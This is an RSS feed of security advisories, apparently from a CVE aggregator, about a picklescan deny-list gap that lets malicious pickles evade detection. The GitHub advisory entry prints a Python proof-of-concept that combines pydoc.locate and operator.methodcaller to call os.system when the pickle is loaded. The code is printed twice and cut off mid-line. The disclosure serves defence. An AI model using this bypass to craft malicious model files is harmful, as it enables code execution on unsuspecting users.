<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Sat, 10 Oct 2026 14:30:53 +0000</lastBuildDate>
    <item>
      <title>CVE-2025-71320 — picklescan - Remote Code Execution via Incomplete Disallowed Inputs</title>
      <link>https://cve.radiocsirt.org/vuln/cve-2025-71320</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; picklescan&lt;/p&gt;
&lt;p&gt;picklescan before 0.0.33 contains an incomplete deny-list that fails to block pydoc.locate and operator.methodcaller functions, allowing attackers to bypass security checks. Remote attackers can craft malicious pickle files using these unblocked functions to achieve arbitrary code execution when the pickle is deserialized.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; picklescan&lt;/p&gt;
&lt;p&gt;picklescan before 0.0.33 contains an incomplete deny-list that fails to block pydoc.locate and operator.methodcaller functions, allowing attackers to bypass security checks. Remote attackers can craft malicious pickle files using these unblocked functions to achieve arbitrary code execution when the pickle is deserialized.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/cve-2025-71320</guid>
    </item>
    <item>
      <title>GHSA-84r2-jw7c-4r5q — Picklescan has Incomplete List of Disallowed Inputs</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-84r2-jw7c-4r5q</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Summary
Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly
* pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string &amp;#34;os&amp;#34; to the actual os module).
* operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system.&lt;/p&gt;
&lt;p&gt;Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as &amp;#34;Safe&amp;#34; or &amp;#34;Suspicious&amp;#34; (depending on configuration) but does not flag them as &amp;#34;Dangerous&amp;#34;, allowing the malicious file to bypass the security check.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;use the provided script to create a malicious pickle file&lt;/p&gt;
&lt;p&gt;```python
import pickle
import pydoc
import operator
import os&lt;/p&gt;
&lt;p&gt;class ModuleLocator:
    def __init__(self, module_name):
        self.module_name = module_name
        
    def __reduce__(self):
        return (pydoc.locate, (self.module_name,))&lt;/p&gt;
&lt;p&gt;class RCEPayload:
    def __reduce__(self):
        
        cmd = &amp;#34;notepad&amp;#34; #put your payload here
        
        mc = operator.methodcaller(&amp;#34;system&amp;#34;, cmd)
        return (mc, (ModuleLocator(&amp;#34;os&amp;#34;),))&lt;/p&gt;
&lt;p&gt;def generate_exploit():
    payload = RCEPayload()
    
    try:
        with open(&amp;#34;bypass.pkl&amp;#34;, &amp;#34;wb&amp;#34;) as f:
            f.write(pickle.dumps(payload))
        print(&amp;#34;File &amp;#39;bypass.pkl&amp;#39; created.&amp;#34;)
    except E…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: picklescan&lt;/p&gt;
&lt;p&gt;### Summary
Currently picklescanner only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to go through undetected and achieve RCE on the final user. Particularly
* pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string &amp;#34;os&amp;#34; to the actual os module).
* operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system.&lt;/p&gt;
&lt;p&gt;Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as &amp;#34;Safe&amp;#34; or &amp;#34;Suspicious&amp;#34; (depending on configuration) but does not flag them as &amp;#34;Dangerous&amp;#34;, allowing the malicious file to bypass the security check.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;use the provided script to create a malicious pickle file&lt;/p&gt;
&lt;p&gt;```python
import pickle
import pydoc
import operator
import os&lt;/p&gt;
&lt;p&gt;class ModuleLocator:
    def __init__(self, module_name):
        self.module_name = module_name
        
    def __reduce__(self):
        return (pydoc.locate, (self.module_name,))&lt;/p&gt;
&lt;p&gt;class RCEPayload:
    def __reduce__(self):
        
        cmd = &amp;#34;notepad&amp;#34; #put your payload here
        
        mc = operator.methodcaller(&amp;#34;system&amp;#34;, cmd)
        return (mc, (ModuleLocator(&amp;#34;os&amp;#34;),))&lt;/p&gt;
&lt;p&gt;def generate_exploit():
    payload = RCEPayload()
    
    try:
        with open(&amp;#34;bypass.pkl&amp;#34;, &amp;#34;wb&amp;#34;) as f:
            f.write(pickle.dumps(payload))
        print(&amp;#34;File &amp;#39;bypass.pkl&amp;#39; created.&amp;#34;)
    except E…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-84r2-jw7c-4r5q</guid>
    </item>
  </channel>
</rss>
